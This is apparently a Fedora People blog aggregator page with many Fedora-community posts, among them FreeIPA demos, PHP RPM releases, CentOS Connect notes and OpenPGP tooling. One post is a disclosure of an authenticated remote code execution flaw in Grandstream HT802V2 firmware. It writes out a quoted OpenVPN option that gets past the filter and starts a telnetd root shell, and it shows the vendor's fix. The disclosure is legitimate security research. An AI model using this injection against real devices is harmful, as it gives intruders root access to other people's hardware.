/rss20.xml">

Fedora People

FreeIPA local tests and FOSDEM demos

Posted by Alexander Bokovoy on 2025-02-14 11:15:00 UTC

FOSDEM 2025 is behind us. We ran Identity and Access Management devroom at FOSDEM. At the devroom, my team did few talks and demos about FreeIPA and Kerberos. While preparing to those talks, we tried to create demonstrations that could be repeated by others as well. First, this was an attempt to help ourselves, as we need to communicate our advances to others in the teams. Then we started to look at how to show our progress to folks outside of the development groups.

We iterated over our tools and finally ended up with something that is based on what we use in upstream CIs: we use podman containers to run what ends up being ephemeral VMs hosting the software. This doesn’t give ability to handle all possible scenarios. It is not a way to run actual production environments as well. Yet, it allows us a quick reuse and share:

  • descriptive definition of the deployment configuration

  • standard tooling to provision the configuration as containers with podman-compose

  • use of Ansible playbooks to run repeatable actions against the hosts, with inventory taken from the podman-compose integration

The tool, ipalab-config, quickly became flexible enough to be used in multiple scenarios. It powers ansible-freeipa’s own upstream CI, we aim to reuse it for new FreeIPA Web UI development and for the FreeIPA workshop.

For the demos at FOSDEM IAM devroom we put a separate repository that has all the scenarios and even recording files to reproduce the demos: freeipa-local-tests. You can try yourself how local authentication hub or IPA-IPA trust or IPA-IPA migration do work.

This project demonstrates how complex multi-system FreeIPA deployments can be tested locally or in your CI/CD. The test environment is built with the help of podman and orchestrated with ipalab-config and podman-compose tools. FreeIPA environment is deployed with the help of ansible-freeipa. Upstream, we run these tests in Github Actions as well.

Demo labs

Following configurations provided as ‘labs’ that can be reproduced using ipalab-config tool and the configurations from this project:

Demo recordings

Some of the demo labs have automated recording of the operations that could be performed on them. Video recording is built upon excellent VHS tool. A pre-built version for Fedora is provided in COPR abbra/vhs. This build also includes a fix from the upstream PR#551.

Minimal deployment demo

This demo recording includes a minimal use of FreeIPA command line:

  • an administrator logs into a client system over SSH using a password
  • Kerberos ticket is obtained automatically by the SSSD
  • IPA command line tool can authenticate to IPA server using Kerberos

Local KDC demo

The local KDC demo is more evolved:

  • a user logs into their own machine over SSH using a password
  • Kerberos ticket is obtained automatically by the SSSD from the local KDC which is activated on demand
  • User then uses a Kerberos ticket to authenticate to SUDO and obtain root privileges
  • The user also uses the Kerberos ticket to authenticate to Samba server running locally
  • Finally, the user authenticates with Kerberos IAKerb extension to a remotely running Samba server, removing completely a need for NTLM authentication protocol

IPA to IPA trust demo

This is a minimalistic demo of how users and groups from one IPA environment can be resolved in the other IPA environment. There is a trust agreement established between both IPA environments, similarly how IPA can establish a forest level trust with Active Directory.

Infra and RelEng Update – Week 07 2025

Posted by Fedora Community Blog on 2025-02-14 10:00:00 UTC

This is a weekly report from the I&R (Infrastructure & Release Engineering) Team. We provide you both infographic and text version of the weekly report. If you just want to quickly look at what we did, just look at the infographic. If you are interested in more in depth details look below the infographic.

Week: 10th Feb – 14th Feb 2025

Infrastructure & Release Engineering

The purpose of this team is to take care of day to day business regarding CentOS and Fedora Infrastructure and Fedora release engineering work.
It’s responsible for services running in Fedora and CentOS infrastructure and preparing things for the new Fedora release (mirrors, mass branching, new namespaces etc.).
List of planned/in-progress issues

Fedora Infra

CentOS Infra including CentOS CI

Release Engineering

If you have any questions or feedback, please respond to this report or contact us on #redhat-cpe channel on matrix.

The post Infra and RelEng Update – Week 07 2025 appeared first on Fedora Community Blog.

⚙️ PHP version 8.3.16 and 8.4.3

Posted by Remi Collet on 2025-01-17 05:51:00 UTC

RPMs of PHP version 8.4.3 are available in the remi-modular repository for Fedora ≥ 39 and Enterprise Linux ≥ 8 (RHEL, Alma, CentOS, Rocky...).

RPMs of PHP version 8.3.16 are available in the remi-modular repository for Fedora ≥ 39 and Enterprise Linux ≥ 8 (RHEL, Alma, CentOS, Rocky...).

ℹ️ The packages are available for x86_64 and aarch64.

ℹ️ There is no security fix this month, so no update for version 8.1.31 and version 8.2.27.

⚠️ PHP version 8.0 has reached its end of life and is no longer maintained by the PHP project.

These versions are also available as Software Collections in the remi-safe repository.

Version announcements:

ℹ️ Installation: use the Configuration Wizard and choose your version and installation mode.

Replacement of default PHP by version 8.4 installation (simplest):

dnf module switch-to php:remi-8.4/common

Parallel installation of version 8.4 as Software Collection

yum install php84

Replacement of default PHP by version 8.3 installation (simplest):

dnf module switch-to php:remi-8.3/common

Parallel installation of version 8.3 as Software Collection

yum install php83

And soon in the official updates:

⚠️ To be noticed :

  • EL-10 RPMs are built using RHEL-10.0-beta
  • EL-9 RPMs are built using RHEL-9.5
  • EL-8 RPMs are built using RHEL-8.10
  • intl extension now uses libicu74 (version 74.2)
  • mbstring extension (EL builds) now uses oniguruma5php (version 6.9.10, instead of the outdated system library)
  • oci8 extension now uses the RPM of Oracle Instant Client version 23.6 on x86_64, 19.25 on aarch64
  • a lot of extensions are also available, see the PHP extensions RPM status (from PECL and other sources) page

ℹ️ Information:

Base packages (php)

Software Collections (php81 / php82 / php83)

⚙️ PHP version 8.3.17 and 8.4.4

Posted by Remi Collet on 2025-02-14 06:59:00 UTC

RPMs of PHP version 8.4.4 are available in the remi-modular repository for Fedora ≥ 39 and Enterprise Linux ≥ 8 (RHEL, Alma, CentOS, Rocky...).

RPMs of PHP version 8.3.17 are available in the remi-modular repository for Fedora ≥ 39 and Enterprise Linux ≥ 8 (RHEL, Alma, CentOS, Rocky...).

ℹ️ The packages are available for x86_64 and aarch64.

ℹ️ There is no security fix this month, so no update for version 8.1.31 and version 8.2.27.

⚠️ PHP version 8.0 has reached its end of life and is no longer maintained by the PHP project.

These versions are also available as Software Collections in the remi-safe repository.

Version announcements:

ℹ️ Installation: use the Configuration Wizard and choose your version and installation mode.

Replacement of default PHP by version 8.4 installation (simplest):

dnf module switch-to php:remi-8.4/common

Parallel installation of version 8.4 as Software Collection

yum install php84

Replacement of default PHP by version 8.3 installation (simplest):

dnf module switch-to php:remi-8.3/common

Parallel installation of version 8.3 as Software Collection

yum install php83

And soon in the official updates:

⚠️ To be noticed :

  • EL-10 RPMs are built using RHEL-10.0-beta
  • EL-9 RPMs are built using RHEL-9.5
  • EL-8 RPMs are built using RHEL-8.10
  • intl extension now uses libicu74 (version 74.2)
  • mbstring extension (EL builds) now uses oniguruma5php (version 6.9.10, instead of the outdated system library)
  • oci8 extension now uses the RPM of Oracle Instant Client version 23.7 on x86_64, 19.25 on aarch64
  • a lot of extensions are also available, see the PHP extensions RPM status (from PECL and other sources) page

ℹ️ Information:

Base packages (php)

Software Collections (php83 / php84)

What hardware, software, and cloud services do we use?

Posted by Vedran Miletić on 2025-02-14 06:28:12 UTC

What hardware, software, and cloud services do we use?


green and black computer motherboard

Photo source: Patrik Kernstock (@pkernstock) | Unsplash


Our everyday scientific and educational work relies heavily on hardware, software, and, in modern times, cloud services. The equipment that we will mention below is specific to our group; common services used by university and/or faculty employees will not be specifically mentioned here.

Publishing (Material for) MkDocs website to GitHub Pages using custom Actions workflow

Posted by Vedran Miletić on 2025-02-14 06:28:12 UTC

Publishing (Material for) MkDocs website to GitHub Pages using custom Actions workflow


blue and black penguin plush toy

Photo source: Roman Synkevych (@synkevych) | Unsplash


As you can probably see, this website is built using the Material theme for MkDocs, which we have been happily using for over one year after using Sphinx for many years prior to that. GitHub Pages offers built-in support for Jekyll, but not for MkDocs and therefore it requires the manual building and deployment of our website. However, it automates many other things, including HTTPS certificate provisioning on our domain via Let's Encrypt.

There are several somewhat related approaches using GitHub Actions for automating the deployment of MkDocs-generated sites, usually with the Material theme, to GitHub Pages. These guides are not only found on blogs written by enthusiasts; the official Getting started section of the Material for MkDocs documentation describes the usage of GitHub Actions for deployment and provides a generic YAML file for that purpose.

The 46th International TeX Users Group Conference, 2025

Posted by Rajeesh KV on 2025-02-13 09:12:49 UTC

The 46th annual meeting of the International TeX Users Group (TUG 2025) will take place in Thiruvananthapuram (aka Trivandrum), Kerala, India, on 18–20 July, 2025. The Indian TeX Users Group and TeXFolio (STMDocs) with support from International TeX Users Group and sponsors are organizing the event this time as it comes back to India after a long hiatus of 14 years (the last two instances hosted were in 2011 and 2002).

Details about the registration, venue, travel, accommodation, programme, deadlines and important dates etc. are available at the conference page https://tug.org/tug2025/.

Call for participation

TUG conferences always enjoyed excellent presentations and talks about TeX, Typefaces/Fonts, Typesetting, Typography and anything related. Please submit interesting papers — see call for papers and speaker advice. Note that a visa is required for participants from most countries and it is a non-trivial undertaking. Please register and contact the program committee for a visa invitation letter as soon as possible.

The drawings for TUG 2025 are made by notable cartoonist E.P. Unny and the flyer is typeset by CVR.

Authenticated RCE via OpenVPN Configuration File in Grandstream HT802V2 and probably others

Posted by Evgeni Golov on 2025-02-12 16:58:46 UTC

I have a Grandstream HT802V2 running firmware 1.0.3.5 and while playing around with the VPN settings realized that the sanitization of the "Additional Options" field done for CVE-2020-5739 is not sufficient.

Before the fix for CVE-2020-5739, /etc/rc.d/init.d/openvpn did

echo "$(nvram get 8460)" | sed 's/;/\n/g' >> ${CONF_FILE}

After the fix it does

echo "$(nvram get 8460)" | sed -e 's/;/\n/g' | sed -e '/script-security/d' -e '/^[ ]*down /d' -e '/^[ ]*up /d' -e '/^[ ]*learn-address /d' -e '/^[ ]*tls-verify /d' -e '/^[ ]*client-[dis]*connect /d' -e '/^[ ]*route-up/d' -e '/^[ ]*route-pre-down /d' -e '/^[ ]*auth-user-pass-verify /d' -e '/^[ ]*ipchange /d' >> ${CONF_FILE}

That means it deletes all lines that either contain script-security or start with a set of options that allow command execution.

Looking at the OpenVPN configuration template (/etc/openvpn/openvpn.conf), it already uses up and therefor sets script-security 2, so injecting that is unnecessary.

Thus if one can somehow inject "/bin/ash -c 'telnetd -l /bin/sh -p 1271'" in one of the command-executing options, a reverse shell will be opened.

The filtering looks for lines that start with zero or more occurrences of a space, followed by the option name (up, down, etc), followed by another space. While OpenVPN happily accepts tabs instead of spaces in the configuration file, I wasn't able to inject a tab neither via the web interface, nor via SSH/gs_config. However, OpenVPN also allows quoting, which is only documented for parameters, but works just well for option names too.

That means that instead of

up "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"

from the original exploit by Tenable, we write

"up" "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"

this still will be a valid OpenVPN configuration statement, but the filtering in /etc/rc.d/init.d/openvpn won't catch it and the resulting OpenVPN configuration will include the exploit:

# grep -E '(up|script-security)' /etc/openvpn.conf
up /etc/openvpn/openvpn.up
up-restart
;group nobody
script-security 2
"up" "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"

And with that, once the OpenVPN connection is established, a reverse shell is spawned:

/ # uname -a
Linux HT8XXV2 4.4.143 #108 SMP PREEMPT Mon May 13 18:12:49 CST 2024 armv7l GNU/Linux

/ # id
uid=0(root) gid=0(root)

Affected devices

  • HT802V2 running 1.0.3.5 (and any other release older than 1.0.3.10), as that's what I have tested
  • Most probably also other HT8xxV2, as they use the same firmware
  • Most probably also HT8xx(V1), as their /etc/rc.d/init.d/openvpn looks very similar, according to firmware dumps

Fix

After disclosing this issue to Grandstream, they have issued a new firmware release (1.0.3.10) which modifies the filtering to the following:

echo "$(nvram get 8460)" | sed -e 's/;/\n/g' \
                         | sed -e '/script-security/d' \
                               -e '/^["'\'' \f\v\r\n\t]*down["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*up["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*learn-address["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*tls-verify["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*tls-crypt-v2-verify["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*client-[dis]*connect["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*route-up["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*route-pre-down["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*auth-user-pass-verify["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*ipchange["'\'' \f\v\r\n\t]/d' >> ${CONF_FILE}

So far I was unable to inject any further commands in this block.

Timeline

Prioritizing your work with the Eisenhower Matrix

Posted by Ben Cotton on 2025-02-12 13:58:35 UTC

I recently wrote about using the MoSCoW method for prioritizing work at the project level. But how do you prioritize your own individual work? The method that has worked best for me is known as the Eisenhower Matrix.

The Eisenhower Matrix explained

The Eisenhower Matrix requires making two binary choices about a task: is it of high or low importance and is it of high or low urgency? The prioritization then goes like this:

  1. High importance and high urgency. Do these first.
  2. High importance and low urgency. Schedule these.
  3. Low importance and high urgency. Delegate these.
  4. Low importance and low urgency. Don’t do these.

Sometimes you can delegate priority 3 tasks to others in the project, but often you can’t. Those either get done once you finish priority 1 or you end up not doing them. Not everything that’s urgent is important.

I prefer to think of category 4 as “do these when you have the time”, but you can’t do everything you think of, so category 4 is a good place to drop things if you have to. It’s okay to not do things.

Evaluating tasks

On it’s face, the Eisenhower Matrix is very simple. In practice, making the choices about importance and urgency cause a lot of hangups. They don’t need to. Make a quick judgement and refine as you go. The point is to avoid hyperfixating on the act of prioritization so you can get stuff done instead.

Importance

Importance, in particular, is a place where everyone struggles at first. Everything seems important, and there’s a degree of emotional vulnerability in calling some of your tasks “low importance.” It’s a short trip from there to thinking “all of my work is unimportant.”

But here’s the thing: it’s not called “unimportant”, it’s called “low importance.” Everything is relative, so it’s a matter of labeling the less important tasks in your total task universe. If it helps, think of it in terms of impacts down the line. If skipping a task creates a lot of additional work or a time crunch or prevents a key thing from happening on time, that task has high importance. If skipping a task is manageably inconvenient, then it’s of low importance.

For example, as I was thinking about this section, I realized that some of my regular tasks are less important than I labeled them. Posting a reminder about the weekly project maintainer meeting has some importance, but the people who need to be there already have it on their calendar. If I forget one week and other community members don’t join, that’s not ideal, but there’s no real harm. The meetings are recorded anyway. I’ve been using the Eisenhower Matrix for years and I still tend to bias toward high importance.

Urgency

Urgency tends to be easier to manage. We know that some things can wait. Still, it’s sometimes difficult to decide how urgent is urgent. One good rule is this: if there’s an actual deadline looming, the task is urgent. If you’d just like to have it done, it’s not urgent. The looming deadline part is perhaps the trickiest. If a conference’s call for proposals closes in a month, writing your proposal is probably not an urgent task. If it closes at the end of the day, then writing your proposal is urgent. But what if it’s at the end of the week? Or in two weeks? That can be harder to judge.

The thing to remember is that task evaluations are not static. As deadlines approach, tasks can go from low urgency to high urgency. If you complete all of your high importance tasks and no new ones appear, then some of your low importance tasks become high importance relative to what’s left.

Limitations of the Eisenhower Matrix

Like any framework, the Eisenhower Matrix isn’t perfect. It is for making daily decisions on how to prioritize tasks, not to provide one true understanding of the importance and urgency of everything in your life. It’s power and weakness are in its simplicity.

One thing that the Eisenhower Matrix ignores is the time necessary to complete a task. One high importance, high urgency task might take all day (though maybe you should decompose it into smaller tasks). Would accomplishing 10 shorter tasks of lower individual importance or urgency have a greater impact in aggregate? Maybe. The Eisenhower Matrix doesn’t tell you what to do if your priority 1 tasks require more than your entire day. Then again, maybe that’s a sign that you’ve over-importanced some tasks.

How do you decide which of several tasks within a priority category to do first? The Eisenhower Matrix doesn’t say. You can just pick one. If you feel the need to rank them, the refining criteria in the MoSCoW post can help. The main point is that you don’t need to recursively evaluate each tasks until you have a strictly ordered list. That wastes time that you could be spending doing the actual work.

The Eisenhower Matrix also fails to account for how draining or fun a task is. All tasks give the joy of dopamine when you mark them done, but some are actually fun to complete and others are dreadful. I, for example, enjoy posting the recordings and notes from meetings but dread making phone calls. You won’t go to jail for not following your prioritized list exactly, though. If you need some joyful tasks to get you through the drudgery, you can make that choice.

This post’s featured photo by Thomas Bormans on Unsplash.

The post Prioritizing your work with the Eisenhower Matrix appeared first on Duck Alignment Academy.

🎲 PHP version 8.3.17RC1 and 8.4.4RC2

Posted by Remi Collet on 2025-01-31 06:35:00 UTC

Release Candidate versions are available in the testing repository for Fedora and Enterprise Linux (RHEL / CentOS / Alma / Rocky and other clones) to allow more people to test them. They are available as Software Collections, for a parallel installation, the perfect solution for such tests, and also as base packages.

RPMs of PHP version 8.4.4RC2 are available

  • as base packages in the remi-modular-test for Fedora 39-41 and Enterprise Linux ≥ 8
  • as SCL in remi-test repository

RPMs of PHP version 8.3.17RC1 are available

  • as base packages in the remi-modular-test for Fedora 39-41 and Enterprise Linux ≥ 8
  • as SCL in remi-test repository

ℹ️ The packages are available for x86_64 and aarch64.

ℹ️ PHP version 8.2 is now in security mode only, so no more RC will be released.

ℹ️ Installation: follow the wizard instructions.

ℹ️ Announcements:

Parallel installation of version 8.4 as Software Collection:

yum --enablerepo=remi-test install php84

Parallel installation of version 8.3 as Software Collection:

yum --enablerepo=remi-test install php83

Update of system version 8.4:

dnf module switch-to php:remi-8.4
dnf --enablerepo=remi-modular-test update php\*

Update of system version 8.3:

dnf module switch-to php:remi-8.3
dnf --enablerepo=remi-modular-test update php\*

ℹ️ Notice:

  • version 8.4.4RC2 is in Fedora rawhide for QA
  • EL-10 packages are built using RHEL-10.0-beta
  • EL-9 packages are built using RHEL-9.5
  • EL-8 packages are built using RHEL-8.10
  • oci8 extension uses the RPM of the Oracle Instant Client version 23.7 on x86_64 or 19.25 on aarch64
  • intl extension uses libicu 74.2
  • RC version is usually the same as the final version (no change accepted after RC, exception for security fix).
  • versions 8.3.17 and 8.4.4 are planed for February 13th, in 2 weeks.

Software Collections (php83, php84)

Base packages (php)

pass using stateless OpenPGP command line interface

Posted by Kushal Das on 2025-02-12 05:26:13 UTC

Yesterday I wrote about how I am using a different tool for git signing and verification. Next, I replaced my pass usage. I have a small patch to use stateless OpenPGP command line interface (SOP). It is an implementation agonostic standard for handling OpenPGP messages. You can read the whole SPEC here.

Installation

cargo install rsop rsop-oct

And copied the bash script from my repository to the path somewhere.

The rsoct binary from rsop-oct follows the same SOP standard but uses the card to signing/decryption. I stored my public key in ~/.password-store/.gpg-key file, which is in turn used for encryption.

Usage

Here nothing changed related my daily pass usage, except the number of time I am typing my PIN :)

Day Two - CentOS Connect 2025

Posted by Akashdeep Dhar on 2025-02-11 18:30:00 UTC
Day Two - CentOS Connect 2025

I should not have stayed up late the previous night - This thought crossed my mind when I heard the alarm go off at around 0500am Central European Time on the second day of CentOS Connect 2025. On 31st January 2025, we had a bunch of talks planned since the morning and I did not want to miss out on a collection that I had planned on attending. I checked with Greg Sutcliffe who was in the dining area already so while I could have used some more rest, I decided to head down after getting freshened up. After going through my documentation to check the estimated action and projected estimate, I headed down for breakfast. I followed up with Amita Sharma's request to confirm some important details about the Fedora Project's presence during DevConf.IN 2025 while sticking to a light meal.

Day Two - CentOS Connect 2025
CentOS Connect 2025 info shown on the digital signage devices present in the DoubleTree by Hilton Brussels City hotel

At around 0700am Central European Time, Sumantro Mukherjee arrived at the dining area right around the time Greg and I were about to leave and he decided to join us a bit later in the day. Heading down to track number #2 of the Port De Namur station, Greg purchased a collection of tickets for the train ride while I decided to rely on my credit card for the expenses. Funnily enough, we had the exit unblocked at the Rogier station - which was super helpful for a confused Greg who ended up keeping the ticket that we used back in the collection he had. On our way to the DoubleTree by Hilton Brussels City, Greg remarked how happy he was after joining the Red Hat Community Linux Engineering team in a technical role after his stint in the community management role in the Red Hat Ansible community.

Day Two - CentOS Connect 2025
From left to right - Fabian and I exchanging snacks and wishes in the CentOS Connect 2025 event cloakroom

While it was cloudy on that day - the two of us were glad that the rain had paused for a brief period of time in the morning. We made it to the CentOS Connect 2025 reception desk to find Amy Marrich and Dorka Volavkova in the empty venue. We were soon joined by Michel Lind there with whom I caught up with conversations while Greg was getting himself registered for the event. As he was attending the CHAOSScon EU 2025 event the day before, this was the first day of attendance for him here. I also met up with Fabian Arrotin with whom I shared some Indian snacks, namely Chakli, before wishing him luck for the first talk that he had on that day. At around 0900am Central European Time, I dropped off my bags in the cloakroom and left to attend the talk on CentOS Infra SIG Review And Updates.

I shared conversations with Neal Gompa, Mike McLean, and Sherif Nagy in the event corridor before finding a seating beside Michel in the Chestnut Hall. This talk was followed by the presentation on the CentOS Hyperscale SIG Update by Davide Cavalca and Neal at around 0945am Central European Time. I stayed back for the talk on CentOS Alternate Images SIG Update presentation by Troy Dawson at around 1015am Central European Time before heading out into the event corridor again. I met up with Sumantro who had arrived at the event venue by then and Julia Bley, who was giving a tour to her partner, Olaf Bley-Steglich, who was visiting a technical conference for the first time. His innocent inquisitiveness about how Red Hat does business around free and open source felt endearing to me.

Day Two - CentOS Connect 2025
Julia providing Sumantro and me with a quantitative analysis of why it is such a bad idea to plan for an event about three weeks before its commencement

At around 1130am Central European Time, I decided to bide my time into working on my planning around the Fedora Project presence at DevConf.IN 2025 while I was anxiously waiting for Justin W. Flory to arrive at the event. In the meanwhile, I also had conversations with Dorka who mentioned of her inability to help with the Fedora Project presence as she would be busy helping out with DevConf.IN 2025. Brian Profitt mentioned about his presence during DevConf.IN 2025 and volunteered to help with the transit of the booth resources that we would need in Pune - a welcome gesture that I was very appreciative of. In the cloakroom, Julia, Sumantro and I discussed around the feasibility of the Fedora Project presence during DevConf.IN 2025 and just how close we were cutting it to the actual event.

Day Two - CentOS Connect 2025
Greek Bowl with salmon salad would most definitely go down as one of the most fun snacks that I have had in any free and open source software conference so far

After a thorough discussion of the state of affairs, we kept ourselves open to the possibility of having to cancel the organization. Subjective to the budget that we might end up getting, I regarded that the event would be not worth organizing if we were not properly resourced for the same. While I provided Devang Parikh, Rajan Shah and Amita with a tentative nod, it was only after the discussion with Justin that I was able to move ahead. We kicked around for a while in the cloakroom with David Fan and Jess Chitas before heading over for lunch to the event corridor at around 0100pm Central European Time. While we were waiting for Justin's arrival, Sumantro and I shared our lunch consisting of a Greek Bowl with salmon salad while having conversations with Rich Bowen and Carl George.

Day Two - CentOS Connect 2025
From left to right - Myself and Daniel comparing who has it worse in terms of RPM packaging - Python SIG or Rust SIG (Courtesy. Luis Bazan CC-BY-SA 2.0)

I shared with Rich just how the Red Hat Community Platform Engineering team had changed since his departure from the team - covering stories from the renaming of the team and the merger of engineers with quality assurance. It was also interesting to know just how free and open source software communities were perceived and worked with from within the Amazon Web Services teams - where Rich was employed with then. At around 0130pm Central European Time, Justin had arrived at the event venue and we headed inside the cloakroom to have the discussion about the Fedora Project's presence during DevConf.IN 2025. The room seemed to be a lot more occupied than before but that did not stop me from swiftly getting him to speed about the situation and the requirements for the event.

Day Two - CentOS Connect 2025
From left to right - Jess, Julia, myself and Sumantro after wrapping up the discussions around the DevConf.IN 2025 event and heading for lunch

Given the limited period of time that we had before the DevConf.IN 2025 event, my primary resource of swags would have to be the leftovers from the Fedora Project booth at FOSDEM 2025. I was seeking funding for the travel and stay for Samyak Jain and Sumantro among other expenses like dining - the total estimated projection of which came around to be around 2000 USD. As the timing would have had it, all that Justin could reliably provide us with from Fedora Mindshare was barely 150 USD which would very clearly not be enough. While I was advised to keep the plan open to a minimal execution, I decided to reach out to Rajan and Devang with a declination notice for the Fedora Project booth as I promised them by the end of business on that day so that they could proceed ahead without us.

Day Two - CentOS Connect 2025
From left to right - Justin, Akashdeep and Sumantro after we figured that there is Justin's Red Hat is slightly bigger than the one I was provided with on joining Red Hat

After clearing the confusion around the ownership of the Fedora Project's presence during the event which was mistakenly considered to be Amita's instead of mine, we decided to start early from the next edition of DevConf.IN onwards. The only way with which we could avoid a disappointment like the one we just had would be to kick off the planning early during the next edition of DevConf.IN. With the notice being shared to the DevConf.IN 2025 organizer, Sumantro, Justin and I discussed about the plans around the Fedora Project presence around the Asia Pacific region. We also considered pivoting away from our existing presence to other events that we did not previously consider like COSCUP and representing the Fedora Project community there instead for wider outreach and ambassadorship.

Day Two - CentOS Connect 2025
From left to right - Julia, Carl, Mike, myself, Fabian and Olaf sharing a photograph frame in the late afternoon right before Mike's talk on Building RPMs in Konflux

I decided to reach out to the folks from COSCUP at their booth presence during FOSDEM 2025 and we departed for the Chestnut Hall to Mike's talk on Building RPMs in Konflux at around 0400pm Central European Time. On my way to the presentation, I got in touch with Julia and Dorka about the cancellation of the Fedora Project's presence during DevConf.IN 2025. After a quick group photo with all the attendees, speakers and organizers at the event corridor, we headed inside to attend some of the last talks. Before I departed from the event at around 0530pm Central European Time, the event guests from the Red Hat Community Linux Engineering team gathered around for a quick set of photographs - before Sumantro and I headed over to the cloakroom of the event to fetch our belongings.

Day Two - CentOS Connect 2025
From left to right - Peter, Justin, myself and Sumantro sharing a photograph frame after Sumantro and I were pleased to meet Peter after a long time

While there was a waffle party planned by the CentOS Connect 2025 folks in Grand Place at 0830pm Central European Time, I thought of not attending that as I wanted to take care of the Fedora Project during the first day of FOSDEM 2025 early next morning. As we made it into the cloakroom, Sumantro and I were super pleasantly surprised to meet with Peter Boy with whom we were meeting after a long time. After clicking a couple of pictures with him and Justin with whom he was discussing details - the two of us decided to head back to the hotel. I decided not to attend the FLOSS Foundations dinner sponsored by Google as I did not have enough company from the Fedora Project and CentOS Project. Instead, I decided to rely on a takeaway for dinner like I did in the previous couple of days.

Day Two - CentOS Connect 2025
From left to right - Sumantro and I sharing a train ride back to the Port De Namur station and deciding to call it a day before FOSDEM 2025 fun begins on the next day

On our way back to the Moxy Brussels City Center hotel on train number #6, I decided to head out by myself to get my dinner as Sumantro was occupied with some work calls. Half of me wanted to wait for me but the other half of me was getting hungrier by the passing minute as I had relatively lighter breakfast and lunch as I was anxious about the planning around the Fedora Project presence. After getting a Chicken Wrap back with some addons as my order was delayed from Belchicken, I ran into Mike Nolan at the hotel lobby with whom I had the pleasure of meeting after a long time. Through some conversations with Luis Bazan and Justin, I put out a bid for assistance with setting up the Fedora Project booth at FOSDEM 2025 before getting some rest to prepare for the lively next day!

Using openpgp-card-tool-git with git

Posted by Kushal Das on 2025-02-11 11:12:40 UTC

One of the power of Unix systems comes from the various small tools and how they work together. One such new tool I am using for some time is for git signing & verification using OpenPGP and my Yubikey for the actual signing operation via openpgp-card-tool-git. I replaced the standard gpg for this usecase with the oct-git command from this project.

Installation & configuration

cargo install openpgp-card-tool-git

Then you will have to configuration your (in my case the global configuration) git configuration.

git config --global gpg.program <path to oct-git>

I am assuming that you already had it configured before for signing, otherwise you have to run the following two commands too.

git config --global commit.gpgsign true
git config --global tag.gpgsign true

Usage

Before you start using it, you want to save the pin in your system keyring.

Use the following command.

oct-git --store-card-pin

That is it, now your git commit will sign the commits using oct-git tool.

In the next blog post I will show how to use the other tools from the author for various different OpenPGP oeprations.

New badge: SCaLE 22x Attendee !

Posted by Fedora Badges on 2025-02-10 16:56:29 UTC
SCaLE 22x AttendeeYou dropped by the Fedora booth at SCaLE 22x!

Running PostgreSQL with Podman and volume

Posted by Christiano Anderson on 2025-02-10 11:48:24 UTC
This is a short snippet to run PostgreSQL using Podman with a volume. The snippet has been tested on Fedora 41. Create the Podman volume $ podman volume create psqldevel Run PostgreSQL $ podman run -d -p 5432:5432 -v psqldevel:/var/lib/postgresql/data -e POSTGRES_PASSWORD=xx --name psqldevel postgres:latest

Next Open NeuroFedora meeting: 10 February 2025 1300 UTC

Posted by Ankur Sinha on 2025-02-10 09:24:05 UTC
Photo by William White on Unsplash

Photo by William White on Unsplash.


Please join us at the next regular Open NeuroFedora team meeting on Monday 10 February 2025 at 1300 UTC. The meeting is a public meeting, and open for everyone to attend. You can join us in the Fedora meeting channel on chat.fedoraproject.org (our Matrix instance). Note that you can also access this channel from other Matrix home severs, so you do not have to create a Fedora account just to attend the meeting.

You can use this link to convert the meeting time to your local time. Or, you can also use this command in the terminal:

$ date -d 'Monday, February 10, 2025 13:00 UTC'

The meeting will be chaired by @ankursinha. The agenda for the meeting is:

We hope to see you there!

The state of the Location permission on Fedora Linux in 2025

Posted by Fedora Magazine on 2025-02-10 08:00:00 UTC

This article will discuss the state of finding your current geographical location in the Fedora Linux environment.

Background

For many mobile devices it is useful to get the current location. This is usually done using a GPS sensor, where the coordinates (latitude and longitude as given by the satellites) allow for step-by-step directions to the desired destination.

However, sometimes using the GPS isn’t desirable. This may be due to the high battery usage, or sometimes the device doesn’t have a GPS sensor at all. Even more interesting, the user might hit a GPS sensor limitation (such as being indoors) meaning there is a need for a secondary way to detect location to either replace or augment the GPS data.

But, what would that secondary source of data be? The alternative source needs to be some public data that is available for everyone, and we do have those! There are Wifi network identifiers, mobile cell towers data, and Bluetooth beacons. All of these are broadcast constantly, or almost constantly.

Using these alternative sources the user accepts the service of a location service provider (for example, Google Location Services provided by Google on Android). The provider has their own database of the specified device identifiers along with their approximate location. When making a location request the Wifi, Bluetooth, and cell identifiers are sent with the request and the location provider sends back coordinates. In addition they provide the precision of the coordinates based on an average of the locations available from the data in the database.

Of course, there is always the third option of combining both approaches in a way that fits the precision needed for the task. As an example, Google calls this combined approach Fused Location which is provided in their proprietary Google Play Services.

Ok, that is how it generally works and how mobile devices do it. But what about Linux?

So, how does it work on Linux?

In Linux, the software responsible for handling the location requests is Geoclue. As the Geoclue project puts it:

Geoclue is a D-Bus service that provides location information. The goal of the Geoclue project is to make creating location-aware applications as simple as possible.

Geoclue is capable of, among other things:

  • Support for location data based on Wifi (via wpa_supplicant integration. This uses Mozilla Location Service (MLS) by default)
  • Support for location data using GPS (if available)
  • Support for location data using mobile modems (via ModemManager integration)
  • GeoIP support (fallback mode)

Previously the Mozilla Location Service (MLS) was the default location service used under Linux. Unfortunately, in March 2024, Mozilla announced the project was being discontinued, making it necessary to switch to an alternative.

Mozilla Location Services and Ichnaea

Mozilla’s no longer available service called “Mozilla Location Services” (MLS) utilized the open source Ichnaea software. The service was capable of both receiving submitted user-data as well as responding with the approximate location based on user requests.

For submitting new data, users could use use a “stumbler” application. This was able to collect cell data, Wifi data and Bluetooth beacons, associate them with their location, and submit them to MLS or another Ichnea-compatible service.

Users would utilize the collected data by having their system (in the case of Linux or some Android ROMs using MLS) send the info about the radio devices in range and receive back info about the approximate location.

MLS alternatives and setup

